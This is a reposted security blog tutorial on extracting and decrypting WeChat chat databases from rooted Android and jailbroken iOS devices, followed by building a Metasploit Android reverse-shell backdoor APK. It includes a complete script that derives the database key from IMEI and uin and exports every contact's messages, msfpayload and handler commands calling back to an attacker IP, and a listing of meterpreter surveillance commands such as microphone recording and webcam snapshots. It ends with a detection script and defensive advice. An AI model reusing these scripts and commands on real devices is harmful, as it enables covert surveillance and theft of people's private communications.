Extracting WeChat Chat Records from Android and iOS, and Controlling Android via Metasploit
In this article we discuss how to extract WeChat chat records from Android and Apple devices, and demonstrate how a backdoor can be used to control an Android device through Metasploit. The article is fairly basic and hands-on, so readers who have a device may want to follow along while reading. Hopefully it sparks some interest in mobile security.
"How do you get the WeChat chat records from an Android phone or an iPhone?"
0x00 Prerequisites:
The Android device is rooted and has SSHDroid installed (to connect to the phone over ssh/ftp)
The Apple device is jailbroken and has the OpenSSH package installed
0x01 Android:
Many Android users run into the same awkward problem: after a while the phone gets slow without you noticing, until eventually everything lags. Like most people, I chose to root the device to deal with this.
Once an Android device is rooted you have the highest level of access to system files. For example, if WeChat is installed, after rooting you can read and modify the WeChat app's files and configuration through adb shell.
Android apps normally keep their database files under /data/data/packagename/databases; the WeChat app's files are stored at /data/data/com.tencent.mm/MicroMsg
First, download the files to the local machine over FTP:
In the folder named with a 34-character code (it looks like gibberish) you will find the encrypted database file of the WeChat account: EnMicroMsg.db
Opening it with a database manager: it reports that the file is encrypted or is not a database file
On Windows it can be opened with the SQLite Database Browser:
It prompts for a password:
So what password is used to encrypt the database, and how do we obtain it? Searching online shows that WeChat encrypts the data with a combination of the phone's IMEI and the WeChat uin.
The WeChat account uin (user information, the WeChat user identifier) can be obtained in two ways:
1. From the WeChat app's configuration file "system_config_prefs.xml";
2. By capturing the packets of a Web WeChat chat session.
1.1 App configuration file
find / -name "system_config_prefs.xml"
/data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml
cat /data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml | grep uin
<int name="default_uin" value="146****21" />
1.2 Log into Web WeChat in Google Chrome:
After logging in, open a new window and visit chrome://net-internals/#events
Send a message, capture the traffic and search for the uin value
uin:146****21
The uin values found by the two methods are identical.
Dial *#06# on the Android dialer to get the phone's IMEI: 354**********85
The IMEI and the uin concatenated give 354**********85146****21
Take the 32-character lowercase MD5 of it, 1cbf8b842f8bf650aa65e5d3ced07735, and enter its first seven characters, 1cbf8b8, as the password in the SQLite browser.
Linux and Mac users can also run this in a terminal:
echo -n "354**********85146****21" | md5sum | cut -c -7
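To make the security point concrete, here is an added Python example (not from the article, and not WeChat's code) that reproduces the key derivation described above on constructed sample values, reports how large the resulting key space is, and contrasts it with a salted PBKDF2 derivation from a user-held secret. SAMPLE_IMEI and SAMPLE_UIN are made-up values, and the function names are my own.

```python
import hashlib
import os


def wechat_db_key(imei: str, uin: str) -> str:
    """Key scheme described in the article: first 7 hex chars of md5(IMEI + uin)."""
    return hashlib.md5((imei + uin).encode("ascii")).hexdigest()[:7]


def key_space_bits(hex_chars: int) -> int:
    """Effective key size in bits for a key made of `hex_chars` hex characters."""
    return hex_chars * 4


def strong_db_key(passphrase: str, salt: bytes, iterations: int = 200_000) -> bytes:
    """Contrast: a 256-bit key from a user secret and a random salt via PBKDF2-HMAC-SHA256."""
    return hashlib.pbkdf2_hmac("sha256", passphrase.encode("utf-8"), salt, iterations, dklen=32)


# Constructed sample identifiers (not real values).
SAMPLE_IMEI = "354000000000085"
SAMPLE_UIN = "146000021"

if __name__ == "__main__":
    weak = wechat_db_key(SAMPLE_IMEI, SAMPLE_UIN)
    print("derived key:", weak, "->", key_space_bits(len(weak)), "bits of key space")
    salt = os.urandom(16)  # stored next to the database, never reused
    strong = strong_db_key("user passphrase", salt)
    print("pbkdf2 key:", strong.hex(), "->", len(strong) * 8, "bits")
```

The takeaway for a defender: both inputs to the derivation can be read from the device itself (the article shows where), and truncating the digest to seven hex characters leaves a 28-bit key space, so the encryption adds little on top of the device's own access controls. A key derived from a secret only the user holds, with a fresh random salt, does not share either property.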
The WeChat database file now opens successfully. The whole procedure (locating the database over adb, reading the uin and IMEI, deriving the key, decrypting with sqlcipher and exporting the messages per contact) is automated by the wechat2txt.py script below:
import sys
import re
import io
import hashlib
import csv
import time
import locale
import getopt
import subprocess


def run(cmd):
    # Run a shell command and return its stdout as text (replaces the os.popen calls).
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def get_db():
    # Path of the encrypted WeChat database on the device (requires adb root).
    run('adb root')
    text = run('adb shell ls /data/data/com.tencent.mm/MicroMsg/*/EnMicroMsg.db')
    return text.splitlines()[-1] if text else ''


def get_default_uin():
    # Account uin from WeChat's shared preferences file.
    run('adb root')
    text = run('adb shell cat /data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml')
    default_uin = re.findall('name="default_uin" value="([0-9]+)"', text)
    return default_uin[0] if default_uin else ''


def get_device_id():
    # IMEI ("Device ID") as reported by dumpsys.
    text = run('adb shell dumpsys iphonesubinfo')
    device_id = re.findall('Device ID = ([0-9]+)', text)
    return device_id[0] if device_id else ''


def get_md5():
    # Database key: first seven hex characters of md5(IMEI + uin).
    default_uin = get_default_uin()
    device_id = get_device_id()
    if default_uin and device_id:
        return hashlib.md5((device_id + default_uin).encode()).hexdigest()[:7]
    return ''


def parse_msgcsv(msgcsv):
    # Parse the CSV export of the message table and yield
    # [talker, timestamp, sender, content, image path] for each row.
    locale.setlocale(locale.LC_ALL, '')
    if isinstance(msgcsv, str):
        msgcsv = io.StringIO(msgcsv)
    reader = csv.reader(msgcsv)
    next(reader)  # skip the header row
    for row in reader:
        try:
            (_msg_id, _svr_id, _msg_type, _status, is_send, _show_timer,
             create_time, talker, content, img_path, _reserved, _lvbuffer) = row[:12]
        except ValueError:
            continue  # short or malformed row
        sender = 'me' if is_send == '1' else talker
        local_time = time.localtime(int(create_time) // 1000)
        stamp = time.strftime("%Y-%m-%d %a %H:%M:%S", local_time)
        yield [talker, stamp, sender, content, img_path]


def get_names(chat):
    # Distinct talkers (contacts) present in the parsed chat.
    return sorted({talker for talker, _stamp, _sender, _content, _img in chat})


def format_chat(chat, name=''):
    # Render the chat as text; when a name is given, keep only that talker's messages.
    text = []
    wanted = name.lower()
    for talker, stamp, sender, content, img_path in chat:
        content = content.replace('\n', '\n ')
        img_path = ('\t' + img_path) if img_path else ''
        if not wanted:
            text.append('%s: %s %s: %s %s' % (talker, stamp, sender, content, img_path))
        elif talker.lower() == wanted:
            text.append('%s %s: %s %s' % (stamp, sender, content, img_path))
    return '\n'.join(text) + '\n'


def sqlcipher(dbn, script):
    # Feed a script to the sqlcipher CLI and return its output (replaces os.popen2).
    proc = subprocess.run(['sqlcipher', dbn], input=script, capture_output=True, text=True)
    return proc.stdout


def list_tables(dbn, key=''):
    script = ''
    if key:
        script += 'PRAGMA key=%r;\n' % key
        script += 'PRAGMA cipher_use_hmac=off;\n'  # the WeChat database uses SQLCipher without HMAC
    script += '.tables\n'
    return sqlcipher(dbn, script).split()


def decrypt(dbn, key='', table='message'):
    # Dump one table of the encrypted database as CSV with a header row.
    table = table or 'message'
    script = '.header on\n.mode csv\n'
    if key:
        script += 'PRAGMA key=%r;\n' % key
        script += 'PRAGMA cipher_use_hmac=off;\n'
    script += 'select * from %s;\n' % table
    return sqlcipher(dbn, script)


def wechat2txt(names=()):
    in_file = 'EnMicroMsg.db'
    out_file = 'message.csv'
    db = get_db()
    md5 = get_md5()
    run('adb wait-for-device')
    run('adb pull %s %s' % (db, in_file))
    msgcsv = decrypt(in_file, md5)
    if msgcsv.find('\n') < 0:
        return 1  # decryption failed: no rows came back
    with open(out_file, 'w', encoding='utf-8') as f:
        f.write(msgcsv)
    msgs = list(parse_msgcsv(msgcsv))
    if not msgs:
        return 1
    if not names:
        names = get_names(msgs)
    for name in names:
        filename = 'message.%s.txt' % name
        text = format_chat(msgs, name)
        if len(text) > 4:
            with open(filename, 'w', encoding='utf-8') as f:
                f.write(text)
    return 0


help_msg = '''Usage: wechat2txt.py [OPTIONS] [NAME]...
OPTIONS:
  -h    display this help and exit
'''


def main():
    try:
        opts, args = getopt.getopt(sys.argv[1:], 'h')
    except getopt.GetoptError:
        print(help_msg)
        return 1
    for opt, _arg in opts:
        if opt == '-h':
            print(help_msg)
            return 1
    return wechat2txt(args)


if __name__ == "__main__":
    sys.exit(main())
0x02 Apple:
After jailbreaking, all sorts of small packages can be installed through Cydia. I usually install OpenSSH so that I can connect to the Apple device from a terminal and transfer files with sftp:
On iOS the app data folders are named with hash values, so exporting WeChat or QQ chat records is somewhat more involved than on Android.
In practice we can work around this with a few Linux commands (find, grep, xargs).
find /var/mobile/Containers/Data -name "MM.sqlite"
mkdir /cache
find /var/mobile/Containers/Data -name "MM.sqlite" |xargs -I {} dirname {} | xargs -I {} cp -r {}/../../ /cache
0x03 Planting a backdoor on an Android device
3.1 Lab environment
Kali Linux (attacker): 192.168.31.213
Android (target): 192.168.31.118
3.2 Generate the backdoor file:
cd Desktop
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.31.213 LPORT=443 R >0xroot.apk
3.3 Run the Metasploit console
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.31.213
set LPORT 443
run
3.4 Install & run the backdoor app
What can the backdoor do? Let's look at the usage:
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getuid Get the user that the server is running as
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
record_mic: eavesdrop and record through the phone's microphone;
webcam_list: list all the cameras on the Android device;
webcam_snap: take covert photos through the camera...
and so on.
0x04 Demo video
0x05 APK backdoor analysis:
Unpack the apk with an APK analysis tool (apkStudio, Bytecodeviewer) and look at the backdoor app's source:
[screenshot: apkStudio]
In smali/com/metasploit/stage/MainActivity.smali we find the backdoor's server IP and port configuration:
[screenshot: apkStudio]
[screenshot: Bytecodeviewer]
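A defender's counterpart to the analysis above, as an added Python example (not the article's code and not part of any tool it names): it inspects an APK's classes*.dex entries for the class descriptors of the default Metasploit Android stager package the article points to (com/metasploit/stage). The APKs here are constructed in memory with a fake classes.dex so the script runs offline; real dex files carry these descriptors as plain strings in their string table, so the same substring search applies to them. The indicator list and function names are my own.

```python
import io
import zipfile

# Class descriptors of the default Metasploit Android stager package; the article
# locates the handler address in smali/com/metasploit/stage/MainActivity.smali.
STAGER_INDICATORS = [
    "Lcom/metasploit/stage/MainActivity;",
    "Lcom/metasploit/stage/Payload;",
]


def scan_apk(apk_bytes):
    """Return the stager indicators found in any classes*.dex entry of an APK (a zip file)."""
    found = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for name in zf.namelist():
            if not (name.startswith("classes") and name.endswith(".dex")):
                continue
            data = zf.read(name)
            for marker in STAGER_INDICATORS:
                if marker.encode("ascii") in data and marker not in found:
                    found.append(marker)
    return found


def build_sample_apk(dex_strings):
    """Constructed stand-in for an APK: a zip with a placeholder manifest and a fake
    classes.dex whose body is just the given descriptor strings (not a valid dex)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", b"<constructed placeholder>")
        body = b"\x00".join(s.encode("ascii") for s in dex_strings)
        zf.writestr("classes.dex", b"dex\n035\x00" + body)
    return buf.getvalue()


# Constructed samples: one carrying the default stager classes, one ordinary app.
SUSPICIOUS_APK = build_sample_apk([
    "Lcom/metasploit/stage/MainActivity;",
    "Lcom/metasploit/stage/Payload;",
    "Landroid/app/Activity;",
])
BENIGN_APK = build_sample_apk([
    "Lcom/example/notes/MainActivity;",
    "Landroid/app/Activity;",
])

if __name__ == "__main__":
    for label, apk in (("suspicious", SUSPICIOUS_APK), ("benign", BENIGN_APK)):
        hits = scan_apk(apk)
        print(label, "->", hits or "no stager indicators")
```

This catches an unmodified build like the one generated in 3.2; a payload whose package was renamed or whose strings were obfuscated will not match, so treat a hit as one indicator to combine with others (requested permissions, signing certificate, install source) rather than as a verdict on its own.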
0x06 Prevention & security advice
Android: install apps only from trusted sources to avoid malware; turn off USB debugging before plugging into a public charging station.
Apple: change the root password right after jailbreaking; do not keep the default password or use a weak one.
0x07 Download links for the tools in this article:
Reposted from FreeBuf (Hackers & Geeks)